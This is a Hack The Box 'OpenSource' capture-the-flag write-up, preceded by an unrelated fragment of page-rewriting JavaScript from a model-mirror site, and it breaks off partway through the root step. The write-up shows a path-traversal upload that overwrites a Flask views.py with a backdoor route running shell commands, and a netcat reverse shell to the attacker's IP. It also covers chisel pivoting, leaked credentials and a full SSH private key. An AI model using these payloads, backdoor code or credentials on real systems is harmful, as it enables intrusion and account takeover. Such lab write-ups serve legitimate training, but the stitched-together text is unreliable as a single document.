{ // 获取包含Hugging Face文本的span元素 const spans = link.querySelectorAll('span.whitespace-nowrap, span.hidden.whitespace-nowrap'); spans.forEach(span => { if (span.textContent && span.textContent.trim().match(/Hugging\s*Face/i)) { span.textContent = 'AI快站'; } }); }); // 替换logo图片的alt属性 document.querySelectorAll('img[alt*="Hugging"], img[alt*="Face"]').forEach(img => { if (img.alt.match(/Hugging\s*Face/i)) { img.alt = 'AI快站 logo'; } }); } // 替换导航栏中的链接 function replaceNavigationLinks() { // 已替换标记,防止重复运行 if (window._navLinksReplaced) { return; } // 已经替换过的链接集合,防止重复替换 const replacedLinks = new Set(); // 只在导航栏区域查找和替换链接 const headerArea = document.querySelector('header') || document.querySelector('nav'); if (!headerArea) { return; } // 在导航区域内查找链接 const navLinks = headerArea.querySelectorAll('a'); navLinks.forEach(link => { // 如果已经替换过,跳过 if (replacedLinks.has(link)) return; const linkText = link.textContent.trim(); const linkHref = link.getAttribute('href') || ''; // 替换Spaces链接 - 仅替换一次 if ( (linkHref.includes('/spaces') || linkHref === '/spaces' || linkText === 'Spaces' || linkText.match(/^s*Spacess*$/i)) && linkText !== 'OCR模型免费转Markdown' && linkText !== 'OCR模型免费转Markdown' ) { link.textContent = 'OCR模型免费转Markdown'; link.href = 'https://fast360.xyz'; link.setAttribute('target', '_blank'); link.setAttribute('rel', 'noopener noreferrer'); replacedLinks.add(link); } // 删除Posts链接 else if ( (linkHref.includes('/posts') || linkHref === '/posts' || linkText === 'Posts' || linkText.match(/^s*Postss*$/i)) ) { if (link.parentNode) { link.parentNode.removeChild(link); } replacedLinks.add(link); } // 替换Docs链接 - 仅替换一次 else if ( (linkHref.includes('/docs') || linkHref === '/docs' || linkText === 'Docs' || linkText.match(/^s*Docss*$/i)) && linkText !== '模型下载攻略' ) { link.textContent = '模型下载攻略'; link.href = '/'; replacedLinks.add(link); } // 删除Enterprise链接 else if ( (linkHref.includes('/enterprise') || linkHref === '/enterprise' || linkText === 'Enterprise' || linkText.match(/^s*Enterprises*$/i)) ) { if (link.parentNode) { link.parentNode.removeChild(link); } replacedLinks.add(link); } }); // 查找可能嵌套的Spaces和Posts文本 const textNodes = []; function findTextNodes(element) { if (element.nodeType === Node.TEXT_NODE) { const text = element.textContent.trim(); if (text === 'Spaces' || text === 'Posts' || text === 'Enterprise') { textNodes.push(element); } } else { for (const child of element.childNodes) { findTextNodes(child); } } } // 只在导航区域内查找文本节点 findTextNodes(headerArea); // 替换找到的文本节点 textNodes.forEach(node => { const text = node.textContent.trim(); if (text === 'Spaces') { node.textContent = node.textContent.replace(/Spaces/g, 'OCR模型免费转Markdown'); } else if (text === 'Posts') { // 删除Posts文本节点 if (node.parentNode) { node.parentNode.removeChild(node); } } else if (text === 'Enterprise') { // 删除Enterprise文本节点 if (node.parentNode) { node.parentNode.removeChild(node); } } }); // 标记已替换完成 window._navLinksReplaced = true; } // 替换代码区域中的域名 function replaceCodeDomains() { // 特别处理span.hljs-string和span.njs-string元素 document.querySelectorAll('span.hljs-string, span.njs-string, span[class*="hljs-string"], span[class*="njs-string"]').forEach(span => { if (span.textContent && span.textContent.includes('huggingface.co')) { span.textContent = span.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } }); // 替换hljs-string类的span中的域名(移除多余的转义符号) document.querySelectorAll('span.hljs-string, span[class*="hljs-string"]').forEach(span => { if (span.textContent && span.textContent.includes('huggingface.co')) { span.textContent = span.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } }); // 替换pre和code标签中包含git clone命令的域名 document.querySelectorAll('pre, code').forEach(element => { if (element.textContent && element.textContent.includes('git clone')) { const text = element.innerHTML; if (text.includes('huggingface.co')) { element.innerHTML = text.replace(/huggingface.co/g, 'aifasthub.com'); } } }); // 处理特定的命令行示例 document.querySelectorAll('pre, code').forEach(element => { const text = element.innerHTML; if (text.includes('huggingface.co')) { // 针对git clone命令的专门处理 if (text.includes('git clone') || text.includes('GIT_LFS_SKIP_SMUDGE=1')) { element.innerHTML = text.replace(/huggingface.co/g, 'aifasthub.com'); } } }); // 特别处理模型下载页面上的代码片段 document.querySelectorAll('.flex.border-t, .svelte_hydrator, .inline-block').forEach(container => { const content = container.innerHTML; if (content && content.includes('huggingface.co')) { container.innerHTML = content.replace(/huggingface.co/g, 'aifasthub.com'); } }); // 特别处理模型仓库克隆对话框中的代码片段 try { // 查找包含"Clone this model repository"标题的对话框 const cloneDialog = document.querySelector('.svelte_hydration_boundary, [data-target="MainHeader"]'); if (cloneDialog) { // 查找对话框中所有的代码片段和命令示例 const codeElements = cloneDialog.querySelectorAll('pre, code, span'); codeElements.forEach(element => { if (element.textContent && element.textContent.includes('huggingface.co')) { if (element.innerHTML.includes('huggingface.co')) { element.innerHTML = element.innerHTML.replace(/huggingface.co/g, 'aifasthub.com'); } else { element.textContent = element.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } } }); } // 更精确地定位克隆命令中的域名 document.querySelectorAll('[data-target]').forEach(container => { const codeBlocks = container.querySelectorAll('pre, code, span.hljs-string'); codeBlocks.forEach(block => { if (block.textContent && block.textContent.includes('huggingface.co')) { if (block.innerHTML.includes('huggingface.co')) { block.innerHTML = block.innerHTML.replace(/huggingface.co/g, 'aifasthub.com'); } else { block.textContent = block.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } } }); }); } catch (e) { // 错误处理但不打印日志 } } // 当DOM加载完成后执行替换 if (document.readyState === 'loading') { document.addEventListener('DOMContentLoaded', () => { replaceHeaderBranding(); replaceNavigationLinks(); replaceCodeDomains(); // 只在必要时执行替换 - 3秒后再次检查 setTimeout(() => { if (!window._navLinksReplaced) { console.log('[Client] 3秒后重新检查导航链接'); replaceNavigationLinks(); } }, 3000); }); } else { replaceHeaderBranding(); replaceNavigationLinks(); replaceCodeDomains(); // 只在必要时执行替换 - 3秒后再次检查 setTimeout(() => { if (!window._navLinksReplaced) { console.log('[Client] 3秒后重新检查导航链接'); replaceNavigationLinks(); } }, 3000); } // 增加一个MutationObserver来处理可能的动态元素加载 const observer = new MutationObserver(mutations => { // 检查是否导航区域有变化 const hasNavChanges = mutations.some(mutation => { // 检查是否存在header或nav元素变化 return Array.from(mutation.addedNodes).some(node => { if (node.nodeType === Node.ELEMENT_NODE) { // 检查是否是导航元素或其子元素 if (node.tagName === 'HEADER' || node.tagName === 'NAV' || node.querySelector('header, nav')) { return true; } // 检查是否在导航元素内部 let parent = node.parentElement; while (parent) { if (parent.tagName === 'HEADER' || parent.tagName === 'NAV') { return true; } parent = parent.parentElement; } } return false; }); }); // 只在导航区域有变化时执行替换 if (hasNavChanges) { // 重置替换状态,允许再次替换 window._navLinksReplaced = false; replaceHeaderBranding(); replaceNavigationLinks(); } }); // 开始观察document.body的变化,包括子节点 if (document.body) { observer.observe(document.body, { childList: true, subtree: true }); } else { document.addEventListener('DOMContentLoaded', () => { observer.observe(document.body, { childList: true, subtree: true }); }); } })(); \n|_ \n|_http-server-header: Werkzeug/2.1.2 Python/3.10.3\n|_http-title: upcloud - Upload files for Free!\n3000/tcp filtered ppp\n\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n\n```\n\nBy observing port 80 we get the following web page:\n\n![port80.JPG](images/port80.JPG)\n\nBy clicking on [Download](http://10.10.11.164/download) we get the following [source.zip](./source.zip) file.\n\nIf we are clicking on [Take me there!](http://10.10.11.164/upcloud) button we are navigated to the following web page:\n\n![upcloud.JPG](images/upcloud.JPG)\n\nAfter uploading a test file we get the following page:\n\n![testupload.JPG](images/testupload.JPG)\n\nLet's observe the source code to understand the flow.\n\nOn the file ```app/app/views.py``` we can see the following code:\n```python\nimport os\n\nfrom app.utils import get_file_name\nfrom flask import render_template, request, send_file\n\nfrom app import app\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef upload_file():\n if request.method == 'POST':\n f = request.files['file']\n file_name = get_file_name(f.filename)\n file_path = os.path.join(os.getcwd(), \"public\", \"uploads\", file_name)\n f.save(file_path)\n return render_template('success.html', file_url=request.host_url + \"uploads/\" + file_name)\n return render_template('upload.html')\n\n\n@app.route('/uploads/')\ndef send_report(path):\n path = get_file_name(path)\n return send_file(os.path.join(os.getcwd(), \"public\", \"uploads\", path))\n```\n\n```send_report``` function calls to ```get_file_name``` function (from ```utils```) and then sending a file from the web server.\n\nLet's observe ```get_file_name``` function on ```app/app/utils.py```:\n```python\nimport time\n\n\ndef current_milli_time():\n return round(time.time() * 1000)\n\n\n\"\"\"\nPass filename and return a secure version, which can then safely be stored on a regular file system.\n\"\"\"\n\n\ndef get_file_name(unsafe_filename):\n return recursive_replace(unsafe_filename, \"../\", \"\")\n\n\n\"\"\"\nTODO: get unique filename\n\"\"\"\n\n\ndef get_unique_upload_name(unsafe_filename):\n spl = unsafe_filename.rsplit(\"\\\\.\", 1)\n file_name = spl[0]\n file_extension = spl[1]\n return recursive_replace(file_name, \"../\", \"\") + \"_\" + str(current_milli_time()) + \".\" + file_extension\n\n\n\"\"\"\nRecursively replace a pattern in a string\n\"\"\"\n\n\ndef recursive_replace(search, replace_me, with_me):\n if replace_me not in search:\n return search\n return recursive_replace(search.replace(replace_me, with_me), replace_me, with_me)\n```\n\nWe can see the ```get_file_name``` function calls to ```recursive_replace``` to replace all ```../``` with ```\"\"``` to prevent directory traversal.\n\nWe can see on also ```.git``` directory, Let's see which branches we have:\n```console\n┌─[evyatar@parrot]─[/hackthebox/OpenSource/source]\n└──╼ $ git branch \n dev\n* public\n┌─[evyatar@parrot]─[/hackthebox/OpenSource/source]\n└──╼ $ git log\ncommit 2c67a52253c6fe1f206ad82ba747e43208e8cfd9 (HEAD -> public)\nAuthor: gituser \nDate: Thu Apr 28 13:55:55 2022 +0200\n\n clean up dockerfile for production use\n\ncommit ee9d9f1ef9156c787d53074493e39ae364cd1e05\nAuthor: gituser \nDate: Thu Apr 28 13:45:17 2022 +0200\n\n initial\n\n```\n\nLet's check the ```dev``` branch:\n```console\n┌─[evyatar@parrot]─[/hackthebox/OpenSource/source]\n└──╼ $ git checkout dev -f\nSwitched to branch 'dev'\n┌─[evyatar@parrot]─[/hackthebox/OpenSource/source]\n└──╼ $ git log\ncommit c41fedef2ec6df98735c11b2faf1e79ef492a0f3 (HEAD -> dev)\nAuthor: gituser \nDate: Thu Apr 28 13:47:24 2022 +0200\n\ncommit c41fedef2ec6df98735c11b2faf1e79ef492a0f3 (HEAD -> dev)\nAuthor: gituser \nDate: Thu Apr 28 13:47:24 2022 +0200\n\n ease testing\n\ncommit be4da71987bbbc8fae7c961fb2de01ebd0be1997\nAuthor: gituser \nDate: Thu Apr 28 13:46:54 2022 +0200\n\n added gitignore\n\ncommit a76f8f75f7a4a12b706b0cf9c983796fa1985820\nAuthor: gituser \nDate: Thu Apr 28 13:46:16 2022 +0200\n\n updated\n\ncommit ee9d9f1ef9156c787d53074493e39ae364cd1e05\nAuthor: gituser \nDate: Thu Apr 28 13:45:17 2022 +0200\n\n initial\n\n```\n\nBy enumerating the commits we found credentials on ```a76f8f75f7a4a12b706b0cf9c983796fa1985820```:\n```console\n┌─[evyatar@parrot]─[/hackthebox/OpenSource/source]\n└──╼ $ git checkout a76f8f75f7a4a12b706b0cf9c983796fa1985820 -f\nNote: switching to 'a76f8f75f7a4a12b706b0cf9c983796fa1985820'.\n\n┌─[evyatar@parrot]─[/hackthebox/OpenSource/source]\n└──╼ $ cat ./app/.vscode/settings.json\n{\n \"python.pythonPath\": \"/home/dev01/.virtualenvs/flask-app-b5GscEs_/bin/python\",\n \"http.proxy\": \"http://dev01:Soulless_Developer#2022@10.10.10.128:5187/\",\n \"http.proxyStrictSSL\": false\n}\n```\n\nWe can see the credentials ```dev01:Soulless_Developer#2022```.\n\nAccording to the source code before, We can replace the file ```views.py``` with our file.\n\nFirst, Let's create our ```views.py``` file with ```backdoor``` route:\n```python\nimport os\n\nfrom app.utils import get_file_name\nfrom flask import render_template, request, send_file\n\nfrom app import app\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef upload_file():\n if request.method == 'POST':\n f = request.files['file']\n file_name = get_file_name(f.filename)\n file_path = os.path.join(os.getcwd(), \"public\", \"uploads\", file_name)\n f.save(file_path)\n return render_template('success.html', file_url=request.host_url + \"uploads/\" + file_name)\n return render_template('upload.html')\n\n\n@app.route('/uploads/')\ndef send_report(path):\n path = get_file_name(path)\n return send_file(os.path.join(os.getcwd(), \"public\", \"uploads\", path))\n\t\n@app.route('/bd')\ndef bd():\n cmd=request.args.get('cmd')\n return os.system(cmd)\n```\n\nLet's upload our ```views.py``` file on [http://10.10.11.164/upcloud](http://10.10.11.164/upcloud), We need to intercept the request using Burp to change the ```filename``` from ```filename=\"views.py\"``` to ```filename=\"..//app/app/views.py\"``` as follow:\n```HTTP\nPOST /upcloud HTTP/1.1\nHost: 10.10.11.164\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: multipart/form-data; boundary=---------------------------23613858511082285195442481844\nContent-Length: 1016\nOrigin: http://10.10.11.164\nDNT: 1\nConnection: close\nReferer: http://10.10.11.164/upcloud\nUpgrade-Insecure-Requests: 1\n\n-----------------------------23613858511082285195442481844\nContent-Disposition: form-data; name=\"file\"; filename=\"views.py\"\nContent-Type: text/x-python\n\nimport os\n\nfrom app.utils import get_file_name\nfrom flask import render_template, request, send_file\n\nfrom app import app\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef upload_file():\n if request.method == 'POST':\n f = request.files['file']\n file_name = get_file_name(f.filename)\n file_path = os.path.join(os.getcwd(), \"public\", \"uploads\", file_name)\n f.save(file_path)\n return render_template('success.html', file_url=request.host_url + \"uploads/\" + file_name)\n return render_template('upload.html')\n\n\n@app.route('/uploads/')\ndef send_report(path):\n path = get_file_name(path)\n return send_file(os.path.join(os.getcwd(), \"public\", \"uploads\", path))\n\n@app.route('/bd')\ndef bd():\n cmd=request.args.get('cmd')\n return os.system(cmd)\n\n\n-----------------------------23613858511082285195442481844--\n\n\n```\n\nBecause ```recursive_replace``` function replaces ```../``` with ```\"\"``` so ```filename=\"..//app/app/views.py\"``` will be ```filename=\"/app/app/views.py\"``` and thats exactly what we need.\n\nLet's test our backdoor:\n```console\n┌─[evyatar@parrot]─[/hackthebox/OpenSource]\n└──╼ $ sudo tcpdump -i tun0 icmp\ntcpdump: verbose output suppressed, use -v or -vv for full protocol decode\nlistening on tun0, link-type RAW (Raw IP), capture size 262144 bytes\n\n```\n\nNow, Let's send a PING request to our host by browsing to [http://10.10.11.164/bd?cmd=ping%20-c1%2010.10.14.14](http://10.10.11.164/bd?cmd=ping%20-c1%2010.10.14.14) and we get:\n```console\n┌─[evyatar@parrot]─[/hackthebox/OpenSource]\n└──╼ $ sudo tcpdump -i tun0 icmp\ntcpdump: verbose output suppressed, use -v or -vv for full protocol decode\nlistening on tun0, link-type RAW (Raw IP), capture size 262144 bytes\n13:35:26.577312 IP 10.10.14.14 > 10.10.11.164: ICMP echo reply, id 304, seq 14, length 64\n13:35:27.581402 IP 10.10.11.164 > 10.10.14.14: ICMP echo request, id 304, seq 15, length 64\n13:35:27.581466 IP 10.10.14.14 > 10.10.11.164: ICMP echo reply, id 304, seq 15, length 64\n13:35:28.578196 IP 10.10.11.164 > 10.10.14.14: ICMP echo request, id 304, seq 16, length 64\n13:35:28.578261 IP 10.10.14.14 > 10.10.11.164: ICMP echo reply, id 304, seq 16, length 64\n\n```\n\nNow we can get a reverse shell:\n```console\n┌─[evyatar@parrot]─[/hackthebox/OpenSource]\n└──╼ $ sudo nc -lvp 4444\nlistening on [any] 4444 ...\n```\n\nLet's run the following command to get a reverse shell:\n```console\nrm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.14 4444 >/tmp/f\n```\n\nEndcode it:\n```console\nrm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff|%2Fbin%2Fsh%20-i%202%3E%261|nc%2010.10.14.14%2080%20%3E%2Ftmp%2Ff\n```\n\nAnd browse it using ```curl```:\n```console\n┌─[evyatar@parrot]─[/hackthebox/OpenSource]\n└──╼ $ curl \"http://10.10.11.164/bd?cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff|%2Fbin%2Fsh%20-i%202%3E%261|nc%2010.10.14.14%204444%20%3E%2Ftmp%2Ff\"\n```\n\nAnd we get:\n```console\n┌─[evyatar@parrot]─[/hackthebox/OpenSource]\n└──╼ $ sudo nc -lvp 4444\nlistening on [any] 4444 ...\n10.10.11.164: inverse host lookup failed: Unknown host\nconnect to [10.10.14.14] from (UNKNOWN) [10.10.11.164] 36871\n/bin/sh: can't access tty; job control turned off\n/app/app # whoami\nroot\n\n```\n\nAs we can see, We are inside a container.\n\nBy running ```arp -a``` we get the following hosts:\n```console\n/app/app # ifconfig\nifconfig\neth0 Link encap:Ethernet HWaddr 02:42:AC:11:00:07 \n inet addr:172.17.0.7 Bcast:172.17.255.255 Mask:255.255.0.0\n UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1\n RX packets:8277 errors:0 dropped:0 overruns:0 frame:0\n TX packets:5125 errors:0 dropped:0 overruns:0 carrier:0\n collisions:0 txqueuelen:0 \n RX bytes:9326470 (8.8 MiB) TX bytes:1194325 (1.1 MiB)\n\nlo Link encap:Local Loopback \n inet addr:127.0.0.1 Mask:255.0.0.0\n UP LOOPBACK RUNNING MTU:65536 Metric:1\n RX packets:0 errors:0 dropped:0 overruns:0 frame:0\n TX packets:0 errors:0 dropped:0 overruns:0 carrier:0\n collisions:0 txqueuelen:1000 \n RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)\n\n\n/app/app # arp -a\n? (172.17.0.6) at 02:42:ac:11:00:06 [ether] on eth0\n? (172.17.0.9) at 02:42:ac:11:00:09 [ether] on eth0\n? (172.17.0.1) at 02:42:f2:dd:9b:77 [ether] on eth0\n```\n\nWe can see that we have the following hosts ```172.17.0.6,172.17.0.9,172.17.0.1```.\n\nTo make port scanning we need a tunnel, We can use [https://github.com/jpillora/chisel](https://github.com/jpillora/chisel) which is a fast TCP/UDP tunnel, transported over HTTP.\n\nLet's download the [https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_linux_amd64.gz](https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_linux_amd64.gz) version and upload it into the target machine.\n\nIn our host, Let's run:\n```console\n┌─[evyatar@parrot]─[/hackthebox/OpenSource]\n└──╼ $ ./chisel server -p 4445 --reverse \n2022/06/26 14:21:37 server: Reverse tunnelling enabled\n2022/06/26 14:21:37 server: Fingerprint A3o69rYF7s9sPdbSaiyQ1IqhmCNONWLNt+tT3yxEY6M=\n2022/06/26 14:21:37 server: Listening on http://0.0.0.0:4445\n\n```\n\nAnd on the target machine:\n```console\n/tmp # ./chisel client 10.10.14.14:4445 R:socks\n2022/06/26 11:22:46 client: Connecting to ws://10.10.14.14:4445\n2022/06/26 11:22:48 client: Connected (Latency 87.988274ms)\n```\n\nAnd we get session from the target machine:\n```console\n┌─[evyatar@parrot]─[/hackthebox/OpenSource]\n└──╼ $ ./chisel server -p 4445 --reverse \n...\n2022/06/26 14:22:47 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening\n```\n\nLet's configure the proxy on ```/etc/proxychains.conf```:\n```console\n...\n[ProxyList]\nsocks4 127.0.0.1 1080\n```\n\nNOTE: You can read about chisel tunneling on [https://ap3x.github.io/posts/pivoting-with-chisel/](https://ap3x.github.io/posts/pivoting-with-chisel/).\n\nOn the ```nmap``` scanning we ran before we found port ```3000``` is open.\n\nLet's try to find which container listens to this port:\n```console\n┌─[evyatar@parrot]─[/hackthebox/OpenSource]\n└──╼ $ proxychains nc 172.17.0.1 3000 -z -v\nProxyChains-3.1 (http://proxychains.sf.net)\n172.17.0.1: inverse host lookup failed: \n|D-chain|-<>-127.0.0.1:1080-<><>-172.17.0.1:3000-<><>-OK\n(UNKNOWN) [172.17.0.1] 3000 (?) open : Operation now in progress\n┌─[evyatar@parrot]─[/hackthebox/OpenSource]\n└──╼ $ proxychains nc 172.17.0.6 3000 -z -v\nProxyChains-3.1 (http://proxychains.sf.net)\n172.17.0.6: inverse host lookup failed: \n|D-chain|-<>-127.0.0.1:1080-<><>-172.17.0.6:3000-<--timeout\n(UNKNOWN) [172.17.0.6] 3000 (?) : Connection refused\n┌─[evyatar@parrot]─[/hackthebox/OpenSource]\n└──╼ $ proxychains nc 172.17.0.9 3000 -z -v\nProxyChains-3.1 (http://proxychains.sf.net)\n172.17.0.9: inverse host lookup failed: \n|D-chain|-<>-127.0.0.1:1080-<><>-172.17.0.9:3000-<--timeout\n(UNKNOWN) [172.17.0.9] 3000 (?) : Connection refused\n```\n\nWe can see it's open on ```172.17.0.1```, Let's use ```proxychains``` to open firefox and to browse to [http://172.17.0.1:3000/](http://172.17.0.1:3000/):\n\n![gitea.JPG](images/gitea.JPG)\n\nRegiter on [http://172.17.0.1:3000/user/sign_up](http://172.17.0.1:3000/user/sign_up):\n\n![register.JPG](images/register.JPG)\n\n\nBy clicking on [Explore->Users](http://172.17.0.1:3000/explore/users) we get:\n\n![users.JPG](images/users.JPG)\n\nBy logging in to ```dev01``` user with the credentials from the ```dev``` branch (```dev01:Soulless_Developer#2022```) we get:\n\n![dev01.JPG](images/dev01.JPG)\n\nWe can see ```.ssh``` directory on [http://172.17.0.1:3000/dev01/home-backup/src/branch/main/.ssh](http://172.17.0.1:3000/dev01/home-backup/src/branch/main/.ssh):\n\n![ssh.JPG](images/ssh.JPG)\n\n```id_rsa``` of ```dev01``` contains:\n```console\n-----BEGIN RSA PRIVATE KEY-----\n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\n-----END RSA PRIVATE KEY-----\n```\n\nLet's use ```dev01``` SSH private key:\n```console\n┌─[evyatar@parrot]─[/hackthebox/OpenSource]\n└──╼ $ ssh -i dev01_idrsa dev01@10.10.11.164\nload pubkey \"dev01_idrsa\": invalid format\nThe authenticity of host '10.10.11.164 (10.10.11.164)' can't be established.\nECDSA key fingerprint is SHA256:a6VljAI6pLD7/108ls+Bi5y88kWaYI6+V4lTU0KQsQU.\nAre you sure you want to continue connecting (yes/no/[fingerprint])? yes\nWarning: Permanently added '10.10.11.164' (ECDSA) to the list of known hosts.\nWelcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-176-generic x86_64)\n\n * Documentation: https://help.ubuntu.com\n * Management: https://landscape.canonical.com\n * Support: https://ubuntu.com/advantage\n\n System information as of Sun Jun 26 19:50:24 UTC 2022\n\n System load: 0.44 Processes: 241\n Usage of /: 75.8% of 3.48GB Users logged in: 0\n Memory usage: 26% IP address for eth0: 10.10.11.164\n Swap usage: 0% IP address for docker0: 172.17.0.1\n\n\n16 updates can be applied immediately.\n9 of these updates are standard security updates.\nTo see these additional updates run: apt list --upgradable\n\n\nLast login: Mon May 16 13:13:33 2022 from 10.10.14.23\ndev01@opensource:~$ cat user.txt\n36195a91ae4e74463454c52888fe509\n```\n\nAnd we get the user flag ```36195a91ae4e74463454c52888fe509```.\n\n### Root\n\nLet's run [pspy64](https://github.com/DominicBreuker/pspy) to monitor the running processes.\n\nAfter a few minutes we can see the following:\n```console\n...\n2022/06/26 20:04:01 CMD: UID=0 PID=11375 | /bin/bash /root/meta/app/clean.sh \n2022/06/26 20:04:01 CMD: UID=0 PID=11378 | git status --porcelain \n2022/06/26 20:04:01 CMD: UID=0 PID=11386 | git commit 